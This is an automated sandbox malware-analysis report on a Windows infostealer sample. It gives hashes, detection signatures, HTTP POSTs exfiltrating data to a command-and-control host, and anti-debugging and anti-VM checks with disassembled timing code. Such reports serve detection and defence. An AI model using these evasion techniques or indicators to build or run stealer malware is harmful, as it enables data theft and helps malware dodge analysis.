Windows Analysis Report
f9bcOz8SxR.exe

Overview

General Information

Sample name: f9bcOz8SxR.exe
renamed because original name is a hash value
Original sample name: 1d057672840921889505863b33e87671.exe
Analysis ID: 1578919
MD5: 1d057672840921889505863b33e87671
SHA1: 3bbc68098e4080f656c7f92147a54d05d18e1277
SHA256: e4420b07cff76b9f623b1e9ed3957d708769a744f245e27fb3b1e44cdc67eb35
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • f9bcOz8SxR.exe (PID: 3668 cmdline: "C:\Users\user\Desktop\f9bcOz8SxR.exe" MD5: 1D057672840921889505863B33E87671)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: f9bcOz8SxR.exe Avira: detected
Source: f9bcOz8SxR.exe Virustotal: Detection: 50%
Source: f9bcOz8SxR.exe ReversingLabs: Detection: 68%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: f9bcOz8SxR.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: -----BEGIN PUBLIC KEY----- 0_2_008ADCF0
Source: f9bcOz8SxR.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_008EA5B0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_008EB560
Source: f9bcOz8SxR.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_0088255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0088255D
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_008829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_008829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 565156
Source: global traffic HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 143 Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View IP Address: 34.226.108.155
Source: Joe Sandbox View IP Address: 147.45.113.159
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0094A8C0 recvfrom,0_2_0094A8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknown HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 565156
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WE
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: f9bcOz8SxR.exe, 00000000.00000002.2633217403.00000000015F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: f9bcOz8SxR.exe, 00000000.00000003.2620415267.00000000015F2000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2620438543.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633217403.00000000015F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEelf.
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: f9bcOz8SxR.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: f9bcOz8SxR.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: f9bcOz8SxR.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714

System Summary

Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: f9bcOz8SxR.exeStatic PE information: section name: .idata
Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0089CD40 appears 80 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008875A0 appears 696 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 00A5CBC0 appears 104 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 00A37220 appears 96 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0089CCD0 appears 54 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 009644A0 appears 76 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C5340 appears 50 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C4F40 appears 335 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008873F0 appears 111 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C4FD0 appears 288 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0088C960 appears 37 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008871E0 appears 47 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0088CAA0 appears 64 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C50A0 appears 101 times
Source: f9bcOz8SxR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: f9bcOz8SxR.exeStatic PE information: Section: dakbihel ZLIB complexity 0.9944495147459816
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0088255D
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008829FF
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: f9bcOz8SxR.exe Virustotal: Detection: 50%
Source: f9bcOz8SxR.exe ReversingLabs: Detection: 68%
Source: f9bcOz8SxR.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: f9bcOz8SxR.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Section loaded: kernel.appcore.dll
Source: f9bcOz8SxR.exeStatic file information: File size 4436480 > 1048576
Source: f9bcOz8SxR.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: f9bcOz8SxR.exeStatic PE information: Raw size of dakbihel is bigger than: 0x100000 < 0x1b3800

Data Obfuscation

Source: C:\Users\user\Desktop\f9bcOz8SxR.exeUnpacked PE file: 0.2.f9bcOz8SxR.exe.880000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dakbihel:EW;elpejykg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dakbihel:EW;elpejykg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: f9bcOz8SxR.exeStatic PE information: real checksum: 0x445e61 should be: 0x4470f6
Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: f9bcOz8SxR.exeStatic PE information: section name: .idata
Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: f9bcOz8SxR.exeStatic PE information: section name: dakbihel
Source: f9bcOz8SxR.exeStatic PE information: section name: elpejykg
Source: f9bcOz8SxR.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_3_016438F1 push ebx; retn 0052h 0_3_016438F2
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_00C041D0 push eax; mov dword ptr [esp], edx 0_2_00C041D5
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_00902340 push eax; mov dword ptr [esp], 00000000h 0_2_00902343
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_0093C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0093C743
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_008C0AC0 push eax; mov dword ptr [esp], 00000000h 0_2_008C0AC4
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_008E1430 push eax; mov dword ptr [esp], 00000000h 0_2_008E1433
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_009039A0 push eax; mov dword ptr [esp], 00000000h 0_2_009039A3
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_008DDAD0 push eax; mov dword ptr [esp], edx 0_2_008DDAD1
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_00C09F40 push dword ptr [eax+04h]; ret 0_2_00C09F6F
Source: f9bcOz8SxR.exe Static PE information: section name: dakbihel entropy: 7.9549442757670565

Boot Survival

Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\f9bcOz8SxR.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105C63D second address: 105C641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105C641 second address: 105C647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105C647 second address: 105C6C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61848348A2h 0x00000008 jmp 00007F618483489Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 jg 00007F61848348A0h 0x00000019 mov edi, dword ptr [ebp+1244CC55h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F6184834898h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov ebx, dword ptr [ebp+122D2E6Bh] 0x00000041 push 00000000h 0x00000043 add ebx, dword ptr [ebp+122D2867h] 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push ecx 0x0000004d jno 00007F6184834896h 0x00000053 pop ecx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105D5DE second address: 105D66D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007F6184CCBA7Eh 0x00000011 nop 0x00000012 and ebx, 49EEBFB8h 0x00000018 mov dword ptr [ebp+122D238Dh], ebx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F6184CCBA78h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov dword ptr [ebp+124502A9h], edi 0x00000040 clc 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F6184CCBA78h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+122D2C1Ah] 0x00000063 mov di, A2CEh 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105D66D second address: 105D677 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105E71D second address: 105E721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105B9AD second address: 105B9B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105E721 second address: 105E738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6184CCBA7Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F671 second address: 105F682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F618483489Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F682 second address: 105F686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F686 second address: 105F68C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F68C second address: 105F6FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007F6184CCBA80h 0x00000011 sub edi, dword ptr [ebp+122D22ECh] 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F6184CCBA78h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+122D2C72h] 0x0000003a push 00000000h 0x0000003c stc 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F6184CCBA7Dh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F949 second address: 105F94E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106187C second address: 1061882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10608CF second address: 10608F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F61848348A9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1065453 second address: 1065457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100E248 second address: 100E24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100E24E second address: 100E252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100E252 second address: 100E273 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jl 00007F6184834896h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 jnc 00007F618483489Ch 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106D030 second address: 106D03D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106D03D second address: 106D043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106C6D5 second address: 106C6EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA85h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
